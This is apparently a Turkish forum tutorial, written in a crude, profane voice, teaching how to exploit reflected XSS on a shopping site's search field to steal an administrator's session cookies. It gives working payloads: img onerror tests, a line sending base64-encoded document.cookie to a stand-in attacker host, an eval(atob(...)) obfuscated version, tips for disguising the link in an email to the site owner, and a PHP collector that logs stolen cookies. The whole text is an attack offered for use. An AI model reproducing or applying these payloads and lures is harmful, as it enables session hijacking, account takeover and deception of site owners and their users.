hiçbir bok bilmeyen biri olduğunuzu hesaba katarak konuya geçmeden kısa bir özet geçicem bu saldırı nedir ne işe yarar nasıl çalışır; abicim eğer saldıracağınız sitenin sahibi sitenin arayüzünü doğru düzgün filtreleyerek kodlayamamışsa sitede xss zaafiyeti oluşuyor. bu zaafiyet sayesinde sitede js kodu falan çalıştırabiliyorsunuz ve o js kodu sayesinde adminin oturum bilgilerini çalıp admin hesabına girip siteye yönetici olarak giriş yapabiliyorsunuz gerisi sikinizin keyfine kalmış. ister hackleyin ister admin gibi dolaşın.
hedef sitemiz:
imhatimi.org olsun. bu siteyi bir forum olarak hayal etmeyin bir alışveriş sitesi olarak düşünün. siteye girdiğinizde refltected xss aramak için yapmanız gereken yegane şey bir input bulmaktır. input dediğime bakmayın arama kısmı bir inputtur aslında. yani sitede sorgu yapabilidiğiniz iteme input denir.
tamam
imhatimi.org'da bir arama satırı buldunuz. diyelim oradan ürün aratmak istiyorsunuz diyelim
sehpa diye arama yaptınız ve butona bastınız.
url şu hale geldi
imhatimi.org/index.html?query=sehpa yazdığınız
sehpa kelimesi ayrıyeten bide ekrana yazıldı diyelim.
bakalım html kodlarıyla o ekranda yazan sehpa kelimesini kalınlaştırabilecek miyiz?
imhatimi.org/index.html?query=<b>sehpa</b> yazdınız ve ekranda artık daha kalın bir şekilde sehpa yazısını görüyorsunuz.
tamam bu sitede html kodları çalışıyor ama biz html değil js kodu çalıştırmak istiyoruz yoksa kullanıcı verilerini çalamayız.
Normal şartlarda
eskiden chrome güvenliği vb şeyler olmadan önce
imhatimi.org/index.html?query=<script>alert('ananın ami')</script> gibi şeyler yazdığınızda ekranda ananın amı yazılı bir kutu çıktığında anlıyordunuz ki bu sitede reflected xss var. ancak sorun şu ki tarayıcılar xss'nin önüne geçmek için bu gibi kodları engellediler. fakat hala bypass yöntemleri var. Tarayıcı saf şekilde js çalıştırmaz ama eğer ona bir koşul koyarsanız js kodunuzu tetikletebilirsiniz.
imhatitimi.org/index.html?query=<img src=x onerror=alert('ananın ami!')> peki şimdi ne yaptık? bu şu demek oluyor bir koşul verdik görseli aç dedik eğer hata verirse ekrana ananın amı uyarısını bastır dedik. harika artık ekranda js uyarısını görebiliyoruz.
iyi de hocam peki bu boktan açıkla nasıl kullanıcının verilerini elde edeceğiz?
her kullanıcının verileri tarayıcıya cookie olarak kaydedilir. eğer biz o cookieleri tarayıcısından çekebileceğimiz bir kod yazıp url sonuna eklersek mantıken istediğimize erişiriz.
ama bunun için ne gerekiyor? kullanıcının verilerini bir yere göndermemiz gerekiyor ki okuyabilelim öyle değil mi? sizin siteniz
Saldirgan.com olsun çektiğimiz cookie verilerini bu siteye göndereceğiz ve en sonunda kendi sitemizden kullanıcının şifrelerini görebileceğiz. Tabi bu siteye gönderebilmek için bu sitenin bi alıcı dosyası olması lazım ama oraya şimdilik hiç girmiyorum konu sonunda onu da anlatıcam hiç endişelenmeyin.
Buraya kadar anladığınızı varsayıyorum ve buraya kadar okuduğunuz şeyleri özetliyorum;
-sitede arama inputundan zaafiyeti tespit ettik
-ekrana uyarı bastırıp xss olduğundan emin olduk
-artık cookie çekme kodumuzu koyup adminin bilgilerini çekip bir yere göndermek için Saldirgan.com adında bir web sitemiz var.
peki cookie'yi nasıl çekeceğiz? aslına bakarsanız çok da farklı bir kod yazmayacağız yapı bu şekilde;
imhatimi.org/index.html?query=<img src=x onerror=alert(document.cookie)>
görsel yüklemeye çalıştık js koduyla eğer görsel yüklenmezse uyarı kutusu açsın içinde de kullanıcının cookie'sini bastırsın dedik.
tamam artık çıkan cookie'yi kendi sitemiz olan Saldirgan.com'a gönderelim
imhatimi.org/index.html?query=<img src=x onerror="new Image().src='http://Saldirgan.com?data='.concat(btoa(document.cookie))">
hızlıca özetleyim. bir görsel göndermeye çalıştık eğer görsel yüklenmezse hata verirse js kodlarımızı çalıştır dedik ve kodlarımızı yazmaya başladık.
bir yeni görsel adında bir obje oluşturduk ki bu çıkan cookie verisini kendi sitemize gönderebilelim. ardından site linkimizi yazdık. url'de + gibi ifadeler otomatik silindiği için aynı işlevi gören
.concat ifadesini kullandık. şifre verisi içerisindeki farklı ifadeleri bozulmadan alabilmek için btoa ifadesini kullanıp cookie'yi base64 ile filtreledik.
her şey hazır artık linki sitenin sahibine atma vakti geldi.
eğer adama linkin sonunda js kodları yazılı bir link gönderirseniz muhtemelen olayı anlayıp tıklamayacaktır fakat eğer o kodları base64 hale getirip linki o şekilde yollarsanız şöyle bir görüntü ortaya çıkar
imhatimi.org/index.html?query=%3Cimg src=x onerror="eval(atob('bmV3IEltYWdlKCkuc3JjPSdodHRwOi8vU2FsZGlyZ2FuLmNvbT9kYXRhPScuY29uY2F0KGJ0b2EoZG9jdW1lbnQuY29va2llKSk='))"%3E
artık url yapımız biraz daha anonim ancak hala yeteri kadar tıklatacak düzeyde değil.
site sahibine mail yoluyla ulaşacak olursanız bağlantıyı editle diye bir seçenek var. görünen kısma sitenin ana dizini kısmını yazın geri kalan kısmını gizleyin.
site sahibine "bu nedir" yazıp adamın sitesinin linkini bile yollasanız muhtemelen tıklayacaktır.
yönetici linke tkladığında cookie verileri anlık olarak size ait olan
Saldirgan.com 'a veri olarak düşecektir.
işte bu kadar. hazır hatırlamışken şu sizin sitenize dosyanın yazılması için dosyanın kodlarını vereyim.
Kod:
<?php
if (isset($_GET['data'])) {
$gelen_veri = $_GET['data'];
$cozulmus_veri = base64_decode($gelen_veri);
$zaman = date('Y-m-d H:i:s');
$log_mesaji = "[$zaman] Gelen Bilgi: " . $cozulmus_veri . PHP_EOL;
file_put_contents('keriz.txt', $log_mesaji, FILE_APPEND);
}
header('Content-Type: image/png');
echo base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=');
?>
